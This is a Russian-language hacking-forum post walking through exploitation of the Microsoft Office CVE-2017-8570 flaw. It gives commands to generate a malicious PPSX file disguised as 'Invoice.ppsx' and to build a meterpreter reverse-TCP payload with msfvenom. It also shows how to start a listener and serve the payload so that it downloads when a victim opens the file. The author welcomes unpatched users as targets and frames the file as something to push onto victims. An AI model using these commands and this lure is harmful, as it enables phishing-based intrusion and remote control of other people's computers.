Уязвимость Microsoft Office CVE-2017-8570

  • Автор темы HHIDE_DUMP
  • Дата начала
  • Просмотры 716
  • На форуме работает ручное одобрение пользователей. Это значит, что, если Ваша причина регистрации не соответствует тематике форума, а также Вы используете временную почту, Ваша учётная запись будет отклонена без возможности повторной регистрации. В дальнейшем - пожизненная блокировка обоих аккаунтов за создание мультиаккаунта.
  • Мы обновили Tor зеркало до v3!
    Для входа используйте следующий url: darkv3nw2...bzad.onion/
  • Мы вновь вернули telegram чат форуму, вступайте, общайтесь, задавайте любые вопросы как администрации, так и пользователям!
    Ссылка: https://t.me/chat_dark_time

HHIDE_DUMP

Гость
H

HHIDE_DUMP

Гость
Всем привет. Сегодня разберем такую уязвимость как
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
CVE 2017 8570.



Данная уязвимость позволяет получить доступ к удаленной машине используя специально подготовленный файл PowerPoint, более подробно о ней можете почитать по ссылке:

Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
.



Использована она может быть на следующих версиях:

  • Microsoft Office 2007 Service Pack 3
  • Microsoft Office 2010 Service Pack 2 (32-bit editions)
  • Microsoft Office 2010 Service Pack 2 (64-bit editions)
  • Microsoft Office 2013 RT Service Pack 1
  • Microsoft Office 2013 Service Pack 1 (32-bit editions)
  • Microsoft Office 2013 Service Pack 1 (64-bit editions)
  • Microsoft Office 2016 (32-bit edition)
  • Microsoft Office 2016 (64-bit edition)
На данный момент уязвимость устранена в текущих обновлениях, но, как мы знаем, что многие пренебрегают обновлениями, что нам конечно на руку.



И так поехали:

1. Заходим по ссылке
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
скачиваем, не забываем читать README.md , там будет рассмотрено три сценария атаки используя данную уязвимость. Мы в данной статье остановимся на первом сценарии.


Вкратце:

- генерируем наш вредоносный PPSX файл,

- создаем полезную нагрузку и запускаем слушатель.

- запускаем сервер на 80 порту.



Давайте непосредственно приступим к делу.

Создаем в директории «Office8570» новую папку и назовем ее «template», далее переносим файл template.ppsx в эту папку. Если этого не сделать то при генерировании PPSX файла выскочит ошибка.


1.Сейчас генерируем наш PPSX файл, пишем в терминале в одну строчку следующее:

Код:
python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://192.168.0.104/logo.doc


Не забываем вместо моего ip ставить свой, если кто не знает как узнать свой ip, делается это командой ifconfig. У вас должен появится файл Invoice.ppsx.


2. Создаем полезную нагрузку,где будет создан файл shell.exe в каталоге tmp, в моем случае это будет выглядеть следующим образом:

Код:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4444 -f exe > /tmp/shell.exe

Для создания полезной нагрузки можем использовать любой другой инструмент, не обязательно использовать msfvenom, главное перенести полезную нагрузку потом в каталог tmp.


Запускаем слушатель:

Код:
msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.0.104; set LPORT 4444; run"

3. Далее в терминале пишем следующую строчку

Код:
python cve-2017-8570_toolkit.py -M exp -e http://192.168.0.104/shell.exe -l /tmp/shell.exe

по итогу, у нас запустится сервер на 80 порту.

Далее нам осталось впарить файл Invoice.ppsx , и как только его откроют ,с сервера погрузится наша полезная нагрузка.

Всем хорошего вечера и удачного пентеста!!!
 

О нас

  • Наше сообщество существует уже много лет и гордится тем, что предлагает непредвзятое, критическое обсуждение различных тем среди людей разных слоев общества. Мы работаем каждый день, чтобы убедиться, что наше сообщество является одним из лучших.

    Dark-Time 2015 - 2024

    При поддержке: XenForo.Info

Быстрая навигация

Меню пользователя